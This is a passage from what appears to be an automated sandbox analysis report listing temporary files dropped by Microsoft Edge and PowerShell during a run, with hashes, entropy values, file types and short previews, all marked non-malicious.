                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Local State (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1370
                                                                                                              Entropy (8bit):5.5510312334540215
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtEdJUIRSZKEyik/2AxJdXBuBuwBaamziNhPhX/KQQRCYfYg:YuBqDPafmd5Rixk5gBzBaF4PhPLB0
                                                                                                              MD5:2EAEB043BB17B3D703B5CB06BF0D09E0
                                                                                                              SHA1:951044F82168B66FE85D98E933ABA4E446EDDACA
                                                                                                              SHA-256:11A3B054C47684F06AF287C69A38850056847559457B59D69579D6C79196F55C
                                                                                                              SHA-512:0DE55161E36A3C3FF0B8B24A0D69EB5BB94EAF265087F54FCCA3055F819F26342D394824455F29FEA1F9ED8B30CF16B1749863ECFE6F0E3DF447DF422A1D9E14
                                                                                                              Malicious:false
                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACNCo8NlEYSSqUyvq1AQjqsEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAClAF9LgBbBTIsDM0YWKKQg3ysELvGn+HESR2V3BWdyVgAAAAAOgAAAAAIAACAAAADOLM6cF690d81bDPi1fwHu/WD82a/ImAcGuU2Jd0URkDAAAAAU1de3aJSlx9YNq/FpjcSIJBLhVt7OUkt+65q3t4hwucQtKNP3SBVrEh/4SaV3KuFAAAAAsj/ONyPXNgQVEr9xFRkXrGY55+xfJFwLAZ+n/FwJnjwqWOd8bS7P4wV8GaxfKEc3mkbASuuvi/S6ZHRY7iBJeg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865182320431","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391582"},"user_experienc

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):8003
                                                                                                              Entropy (8bit):4.840877972214509
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                              MD5:106D01F562D751E62B702803895E93E0
                                                                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllultnxj:NllU
                                                                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3jrpzey.xgu.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rezjztpn.zuu.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsbs2ncf.suq.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxivwyol.sdw.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\4456d602-e423-4cf1-9dce-999c55ebd5d0.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1370
                                                                                                              Entropy (8bit):5.5510312334540215
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtEdJUIRSZKEyik/2AxJdXBuBuwBaamziNhPhX/KQQRCYfYg:YuBqDPafmd5Rixk5gBzBaF4PhPLB0
                                                                                                              MD5:2EAEB043BB17B3D703B5CB06BF0D09E0
                                                                                                              SHA1:951044F82168B66FE85D98E933ABA4E446EDDACA
                                                                                                              SHA-256:11A3B054C47684F06AF287C69A38850056847559457B59D69579D6C79196F55C
                                                                                                              SHA-512:0DE55161E36A3C3FF0B8B24A0D69EB5BB94EAF265087F54FCCA3055F819F26342D394824455F29FEA1F9ED8B30CF16B1749863ECFE6F0E3DF447DF422A1D9E14
                                                                                                              Malicious:false
                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACNCo8NlEYSSqUyvq1AQjqsEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAClAF9LgBbBTIsDM0YWKKQg3ysELvGn+HESR2V3BWdyVgAAAAAOgAAAAAIAACAAAADOLM6cF690d81bDPi1fwHu/WD82a/ImAcGuU2Jd0URkDAAAAAU1de3aJSlx9YNq/FpjcSIJBLhVt7OUkt+65q3t4hwucQtKNP3SBVrEh/4SaV3KuFAAAAAsj/ONyPXNgQVEr9xFRkXrGY55+xfJFwLAZ+n/FwJnjwqWOd8bS7P4wV8GaxfKEc3mkbASuuvi/S6ZHRY7iBJeg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865182320431","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391582"},"user_experienc

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\5a11d1eb-676f-4588-b384-83dac0c9e65e.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3280
                                                                                                              Entropy (8bit):5.592397070864384
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0q8NkC1fmdieak+3BI51vcFpdPvJkOcTSDS4S4SDSbI4a:/8Nb8dE5dZkO4
                                                                                                              MD5:C80285A17C48074FF24CEE78797A5ED2
                                                                                                              SHA1:0AA40D51A953A89687A8210397A098EF6F1A05BC
                                                                                                              SHA-256:964E947B313D0ECBB757EFB2FFE2C977338276FD25900BAC9252E138D0495573
                                                                                                              SHA-512:7BA7EAAF43E6A8E29FCA6E8983BF4BCAC7724F884C05D8B4AE5501F01943C9798AE753CB3EF61C36B7D9126E5DFCF4062A81C28BD21EA6A850FC993ADB8DBEAC
                                                                                                              Malicious:false
                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACNCo8NlEYSSqUyvq1AQjqsEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAClAF9LgBbBTIsDM0YWKKQg3ysELvGn+HESR2V3BWdyVgAAAAAOgAAAAAIAACAAAADOLM6cF690d81bDPi1fwHu/WD82a/ImAcGuU2Jd0URkDAAAAAU1de3aJSlx9YNq/FpjcSIJBLhVt7OUkt+65q3t4hwucQtKNP3SBVrEh/4SaV3KuFAAAAAsj/ONyPXNgQVEr9xFRkXrGY55+xfJFwLAZ+n/FwJnjwqWOd8bS7P4wV8GaxfKEc3mkbASuuvi/S6ZHRY7iBJeg=="},"policy":{"last_statist

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\912f56d6-1979-4e82-a721-5b0236d24b39.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4196
                                                                                                              Entropy (8bit):5.48691661710378
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0q8NkGS1fmdiea58rh/cI9URoDotoqFT8BI51vcFpdPvJkOcTSDS4S4SDSbI4a:/8NBS8dbeoDUI5dZkO4
                                                                                                              MD5:AB6D39112EB1B2A6D22C49FC61B77865
                                                                                                              SHA1:18C20BBA5C560C8AE4038F293E9F175F041F4368
                                                                                                              SHA-256:33D70348E40889D58194835D5C5C2B47528EA513591942B00EB60F88FDBF071C
                                                                                                              SHA-512:308F31E3B43730A1D208F5107491B48136EAAA2C807DB6F08605E477FC6F06C0197E96F1D16B54F2995FC6E12D866A79CF5DAAE46954B368672551B8F70E4BCA
                                                                                                              Malicious:false
                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACNCo8NlEYSSqUyvq1AQjqsEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAClAF9LgBbBTIsDM0YWKKQg3ysELvGn+HESR2V3BWdyVgAAAAAOgAAAAAIAACAAAADOLM6cF690d81bDPi1fwHu/WD82a/ImAcGuU2Jd0URkDAAAAAU1de3aJSlx9YNq/FpjcSIJBLhVt7OUkt+65q3t4hwucQtKNP3SBVrEh/4SaV3KuFAAAAAsj/ONyPXNgQVEr9xFRkXrGY55+xfJFwLAZ+n/FwJnjwqWOd8bS7P4wV8GaxfKEc3mkbASuuvi/S6ZHRY7

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\BrowserMetrics\BrowserMetrics-675174DE-1A60.pma

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4194304
                                                                                                              Entropy (8bit):0.21866984900330974
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:smQODS1S/EGZXeA9R1RG/KqyeRGg1DRFFhqCRG7lP+Tz1nc9sLzgs1Z:smTDD/EGJ9RK/KqyXg1HFhqrR6zY
                                                                                                              MD5:07910E15251F0F06E4F9B8F53E20A6EF
                                                                                                              SHA1:21B1193EC999C768F609DAD4B9F855A3B7E7CD1C
                                                                                                              SHA-256:B20A23647F3F8B36C8089DC615CFD75B65D4B53C58F818C3E2932E0D877158DB
                                                                                                              SHA-512:2ABF7FFD2227B737D67BC3B6E8965ED31EA32B6F6040F9EC95A4F5FE4E905AFC4FB5A95AD17B505F5C37FB9F98C7A33BF0C15FF10E61AD54731E018B6511AA22
                                                                                                              Malicious:false
                                                                                                              Preview:...@..@...@.....C.].....@...................`...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ylhpuy20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@......................................<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....S@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Crashpad\settings.dat

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):280
                                                                                                              Entropy (8bit):1.7770107289812764
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:FiWWltlS3LilF4v+Rj5FSSJ+/tl:o1S3mLjBJ+
                                                                                                              MD5:AD703A3F40605BD318A27215DA9C820F
                                                                                                              SHA1:40452420AA82F483F33A2C13DD71D82FD8DE0F4A
                                                                                                              SHA-256:F722900D900B60F6F697DA8C8149FABEDEDC4847381F357134A598D3F4C7BA5B
                                                                                                              SHA-512:F32B49259CF8AF38D9EEFBF668005139A0734EDD50D2DBB4BE384C8F1FE02802C2300A6B443C4887C56FDB59BAE19D09497D9E673F47E3CBDECB84A331265751
                                                                                                              Malicious:false
                                                                                                              Preview:sdPC......................keR..@.)..u...................................................................................................................................................................................................decbe563-8a8c-43a8-96cb-1977ef766c04............

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Crashpad\throttle_store.dat

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20
                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                              Malicious:false
                                                                                                              Preview:level=none expiry=0.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\6d510b04-4bda-4c1f-abee-5fe18364f481.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:L:L
                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                              Malicious:false
                                                                                                              Preview:.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Cache\Cache_Data\data_0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):45056
                                                                                                              Entropy (8bit):0.012760698469074051
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsFlYhEtlGJllMRAxp//12A+0/X:/FiEXGeRyxD
                                                                                                              MD5:2562B35433604AEDE22A2D41039A6BE2
                                                                                                              SHA1:E6B11B9E5C340A2C0CD661DB4FFE3360736A3B99
                                                                                                              SHA-256:C46B985B66327C617C0CF470EFB72F33BE152164A02FACDE4A1EC7C38262C5EE
                                                                                                              SHA-512:17D73894497CC1DB2CAA957F09F4FA46643C8CD5DAACF21EA43C9A27FB1D41E082E5BC220F80EFDE4A9F70DB9960E2B8A661B736FE6769D017D29B842A764F87
                                                                                                              Malicious:false
                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Cache\Cache_Data\data_1

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):270336
                                                                                                              Entropy (8bit):0.028926716882901618
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:U/BEhPgAQcdCIRrYfhbtZPC93OHjsqJm09MWPG:qYP7d/Rc1PCQHjTpM
                                                                                                              MD5:D137778AB1A214706C2A4800EAC80E04
                                                                                                              SHA1:C897AE0F457979CE071877DEFA8ACCC6969F7E9F
                                                                                                              SHA-256:6132838122579BE019779BBC60B0F8EF8EBBF264E73BFD422471FAF1DACE87D9
                                                                                                              SHA-512:8C7E0FF62615FF3AE1D4D0138176F0437AB005C46DA96B023770039711301F8E8CE7C1395EF81B30A49AB6A196056E0F9A1032851170B88CFB706FD153659CF2
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................s.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Cache\Cache_Data\data_2

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Cache\Cache_Data\data_3

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Cache\Cache_Data\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):524656
                                                                                                              Entropy (8bit):5.027445846313988E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:LsulZ7lll:Lsmlll
                                                                                                              MD5:0124FC300BA1B3F08F9982F29D156C30
                                                                                                              SHA1:BBE5C96AB499372004F3DFD047645AA69E48416E
                                                                                                              SHA-256:6468FCCCF8D05E472D4DC40A2FAC2CF9E41CCD8736AE436DF0CA26268DE1A7B0
                                                                                                              SHA-512:E49C00FF3EB9471A25597D12C9551CB296F8DAF6B195650A15A8C40CDC93D7579EA5CE874FDBF8E3BB3F110C0003AB58DCFDD9DB934CC308C9824BEB3B32C33C
                                                                                                              Malicious:false
                                                                                                              Preview:.........................................!.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\js\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):24
                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:m+l:m
                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                              Malicious:false
                                                                                                              Preview:0\r..m..................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Code Cache\js\index-dir\temp-index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
